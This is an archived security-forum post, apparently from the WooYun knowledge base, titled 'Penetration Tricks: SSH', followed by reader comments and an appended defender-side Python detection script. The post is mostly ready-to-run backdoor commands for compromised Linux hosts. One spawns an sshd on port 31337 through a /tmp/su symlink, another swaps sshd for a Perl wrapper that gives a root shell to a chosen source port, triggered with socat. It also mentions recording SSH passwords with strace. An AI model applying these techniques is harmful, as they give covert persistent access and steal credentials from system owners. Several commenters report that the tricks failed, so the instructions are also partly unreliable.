<main class="main-container ng-scope" ng-view=""><div class="main receptacle post-view ng-scope"><article class="entry ng-scope" ng-controller="EntryCtrl" ui-lightbox=""><header><h1 class="entry-title ng-binding">Penetration Tricks: SSH</h1><div class="entry-meta"><a target="_blank" class="author name ng-binding">mickey</a> <span class="bull">·</span> <time title="2014/05/12 13:57" ui-time="" datetime="2014/05/12 13:57" class="published ng-binding ng-isolate-scope">2014/05/12 13:57</time></div></header><section class="entry-content ng-binding" ng-bind-html="postContentTrustedHtml"><p>A few small tricks to fool novice administrators.</p><h3>1. You have a shell, the target's firewall imposes no restrictions, and you want to quickly open an SSH port you can reach</h3><p>Run on the compromised host:</p><pre><code>
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
</code></pre><p>This spawns a listener on port 31337. Connect to 31337 with root, bin, ftp or mail as the user name and any password, and you are logged in.</p><p>Screenshot:</p><p><img alt="enter image description here" img-src="2e30d14a59ea7777cda947d115173921cc016286.jpg"></p><h3>2. Build an SSH wrapper backdoor. This works better than the first trick: it opens no extra port, and as long as the target runs an SSH service you can connect remotely</h3><p>Run on the compromised host:</p><pre><code>
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo '#!/usr/bin/perl' &gt;sshd
[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' &gt;&gt;sshd
[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' &gt;&gt;sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart
</code></pre><p>Run on your own machine:</p><pre><code>
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
</code></pre><p>If you want to use a different source port, you can work out the bytes the wrapper has to match with Python's struct standard library:</p><pre><code>
&gt;&gt;&gt; import struct
&gt;&gt;&gt; buffer = struct.pack('&gt;I', 19526)   # big-endian; 19526 is 0x4C46, i.e. the bytes "LF"
&gt;&gt;&gt; print repr(buffer)
'\x00\x00LF'
&gt;&gt;&gt; buffer = struct.pack('&gt;I', 13377)   # 13377 is 0x3441, i.e. the "4A" used in the wrapper above
&gt;&gt;&gt; print buffer
4A
</code></pre><p>Screenshot:</p><p><img alt="enter image description here" img-src="2014091812470923422.png"></p><h3>3. Recording SSH client passwords</h3><p>Once a host is owned, you often want to record the passwords it uses to SSH into other hosts and extend your reach. The strace command is all it takes.</p><p>Screenshot:</p><p><img alt="enter image description here" img-src="bbceff9ee795e8fcc01f6383eed5f1a80ab84182.jpg"></p></section></article><div class="entry-controls clearfix"><div style="float:left;color:#9d9e9f;font-size:15px"><span>&copy; WooYun Knowledge Base. All rights reserved; reproduction without permission is prohibited.</span></div></div><div id="comments" class="comment-list clearfix"><div id="comment-list">
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">niexinming</span> <span class="reply-time">2016-02-01 12:48:35</span></div><p>For the record: none of them worked, 23333</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">ki11y0u</span> <span class="reply-time">2016-01-29 21:14:11</span></div><p>The second one did not work when tested on CentOS.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">赞</span> <span class="reply-time">2015-11-09 00:10:25</span></div><p>The first one did not work for me.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 15:26:25</span></div><p>Mickey, what you wrote is a bit inaccurate.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 15:00:35</span></div><p>Could you share a contact, QQ or something? I have a lot of questions to ask.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-28 14:56:45</span></div><p>Hi, I'd like to discuss the first trick with you. You say to spawn port 22 onto 31337 and then connect to 31337 from outside with root/bin/ftp/mail as the user name and any password. When I tested it, why did it require the correct user name and password? Please explain. Did you really log in successfully with the user root/bin/ftp/mail and an arbitrary password?</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">m0utain</span> <span class="reply-time">2015-05-27 08:28:02</span></div><p>I'd like to ask: does that ln command apply to Linux, Unix and other Unix-like machines alike?</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Mr丶Mario</span> <span class="reply-time">2014-12-30 19:54:10</span></div><p>I kept thinking that image had not finished loading. Refreshed once. Awkward.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Ivan</span> <span class="reply-time">2014-12-22 12:04:52</span></div><p>mark</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">gm100861</span> <span class="reply-time">2014-06-23 10:01:05</span></div><p>Awesome, learning from this.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Bloodwolf</span> <span class="reply-time">2014-05-21 11:02:44</span></div><p>For a server you want to control long term, a kernel backdoor is more fun.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">带馅儿馒头</span> <span class="reply-time">2014-05-18 15:23:03</span></div><p>Thanks for sharing~</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">ACGT</span> <span class="reply-time">2014-05-16 18:32:46</span></div><p>Amazing. How did you find these? Searching, or accumulated over time?</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">冷冷的夜</span> <span class="reply-time">2014-05-16 11:40:36</span></div><p>Nice, very practical.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2014-05-15 16:11:58</span></div><p>By the way, the first tip<br>didn't work for me -_-</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">12345</span> <span class="reply-time">2014-05-15 10:22:18</span></div><p>Applause!</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">tom</span> <span class="reply-time">2014-05-14 14:01:25</span></div><p>mark<br>Adding the article's sources:<br>http://pastebin.com/2NgL8SDE<br>http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/<br>https://diogomonica.com/posts/poor-man-s-ssh-keylogger/</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Seven.Sea</span> <span class="reply-time">2014-05-14 13:59:23</span></div><p>Mark, simple and practical.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">动后河</span> <span class="reply-time">2014-05-13 23:45:53</span></div><p>strace<br>still don't get it</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">laterain</span> <span class="reply-time">2014-05-13 10:57:56</span></div><p>Very practical tricks, +32 likes<br>Finally no more grinding away at that damn root password</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Xeyes</span> <span class="reply-time">2014-05-13 10:48:44</span></div><p>Good article~~~~~ Bookmarked.</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">L.N.</span> <span class="reply-time">2014-05-12 19:59:28</span></div><p>Have to give this a thumbs up!</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">insight-labs</span> <span class="reply-time">2014-05-12 18:32:48</span></div><p>Learned something~~ Props to Mickey~</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">xiaoL</span> <span class="reply-time">2014-05-12 16:43:44</span></div><p>Concise and practical!</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">Kavia</span> <span class="reply-time">2014-05-12 16:15:57</span></div><p>Mickey the master has put out another great piece, awesome!</p></div></div>
<div class="note-comment"><img class="avatar" alt="30" src="http://wooyun.b0.upaiyun.com/wooyun_job/avatar/default.png"><div class="content"><div class="comment-header"><span class="author-link">livers</span> <span class="reply-time">2014-05-12 16:01:11</span></div><p>Props, mickey!</p></div></div>
</div></div></div></main>
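<p>Added defender-side example, not from the original post or its sources: a Python 3 host check for the three tricks described in the article (sshd launched through a renamed symlink with a port override, the sshd binary replaced by a script wrapper, and an ssh client being traced). It assumes a Linux host with sshd installed at /usr/sbin/sshd and reads the live /proc table; the record layout and the sample values in the comments are constructed.</p>

```python
# Added example, not from the original post: host checks for the three sshd
# tricks above. Paths are assumptions for a typical Linux host.
import os, re
def sshd_is_script(head: bytes) -> bool:
    # Trick 2 swaps the sshd ELF for a Perl script: no ELF magic at offset 0.
    return not head.startswith(b"\x7fELF")

def sshd_from_odd_path(exe: str, cmdline: list) -> bool:
    # Trick 1 runs sshd via a symlink (/tmp/su -oPort=31337); /proc/<pid>/exe
    # resolves to the real binary, so compare it with argv[0] and the args.
    if os.path.basename(exe) != "sshd":
        return False
    argv0 = os.path.basename(cmdline[0]) if cmdline else ""
    renamed = not argv0.startswith("sshd")  # "sshd: user [priv]" is normal
    port_override = any(a.startswith(("-oPort", "-p")) for a in cmdline[1:])
    return renamed or port_override

def ssh_client_traced(status_text: str) -> bool:
    # Trick 3 attaches strace to ssh: a traced process shows TracerPid != 0.
    m = re.search(r"^TracerPid:\s*(\d+)", status_text, re.M)
    return m is not None and int(m.group(1)) != 0

def scan(records):
    # records: iterable of (pid, exe, argv list, status text); returns findings
    out = []
    for pid, exe, cmd, status in records:
        if sshd_from_odd_path(exe, cmd):
            out.append(f"pid {pid}: sshd started as {' '.join(cmd)}")
        if cmd and os.path.basename(cmd[0]) == "ssh" and ssh_client_traced(status):
            out.append(f"pid {pid}: ssh client is being ptraced")
    return out

def live_records():
    # Walk the live /proc table; entries we cannot read are skipped.
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmd = [c.decode(errors="replace") for c in f.read().split(b"\0") if c]
            with open(f"/proc/{pid}/status") as f:
                status = f.read()
        except OSError:
            continue
        yield pid, exe, cmd, status

if __name__ == "__main__":
    if os.path.exists("/usr/sbin/sshd"):
        with open("/usr/sbin/sshd", "rb") as f:
            print("sshd is a script:", sshd_is_script(f.read(4)))
    print("\n".join(scan(live_records()) or ["no findings"]))
```

Run it as root so every /proc entry is readable; a legitimately customised sshd command line is reported too, so treat findings as items to review rather than proof of compromise.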